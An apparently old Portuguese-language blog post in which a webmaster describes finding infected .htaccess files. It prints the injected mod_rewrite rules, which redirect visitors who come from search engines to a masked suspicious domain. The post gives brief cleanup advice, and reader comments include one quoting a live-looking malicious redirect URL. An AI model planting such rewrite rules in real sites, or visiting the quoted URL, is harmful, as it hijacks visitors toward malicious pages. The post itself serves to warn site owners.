Agora, para além de aceder às passwords Meo/Thomson/D-Link pode divertir-se no nosso site, veja os nossos conteúdos de entretenimento
Virus em ficheiros .htaccess
Artigo publicado a 01 Abr, 2009 em Geral por Pimpão

Com algum espanto hoje verifiquei que um site que fiz tinha virus, corri e percorri o codigo todo sem encontrar nada em concreto, até que ao fim de umas horas decidi começar a verificar ficheiro por ficheiro em cada pasta incluindo o .htaccess onde verifiquei que tinha ficheiros .htaccess com o texto que segue mais abaixo.

Virus utiliza o mod_rewrite infectando htaccess

É claro que eu ao visitar o site nunca iria ver o virus, pois o .htaccess faz uso do mod_rewrite do apache para redireccionar os visitantes que chegam ao nosso site a partir dos motores de busca para sites “suspeitos”.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://xxxxxx-xxxxxxx.xxxx [R,L]

A remoção do virus é basntante simples e passa tambem pelo que já expliquei no virus iframe como lhe chamei, passa pela limpeza do computador que no meu caso está “limpo” julgo eu :-) e pela alteração de passwords ftp.

Este artigo tem 3 opiniões

  1. Josias

    Cara isso aconteceu comigo e que dor de cabeça… vou seguir as dicas e malditos iframes…

  2. Sorovisk

    Isso tb acontenceu comigo, deu uma puta dor de cabeça, foda que no meu servidor tinha ums 3 dominios e todos bem divulgados no google ..ai virou uma zona …puta merdaaa

  3. Miranda

    Realmente isso é uma dor de cabeça. Têm uma paulada de sites de renome que estão com os htaccess infectados. Isso faz emganar especialmente o buscador do Google. Ao clicar-se nos links do site que administro nos links de resultado do Google, ocorria o redirecionamento para o seguinte link:

    http://top.reliablebanner.com/main.php?i=Js2oitQcrP6ngRj7U8RGy5wXpQ==&e=0

    Essa praga se alojou não só no htaccess do diretório raiz, mas também em todas as pastas e subpastas. Limpei os htaccess um a um e tudo voltou ao normal.

Deixe a sua opinião




Template WordPress por Sybo
(C) 2013 lixei.me - Todos os direitos reservados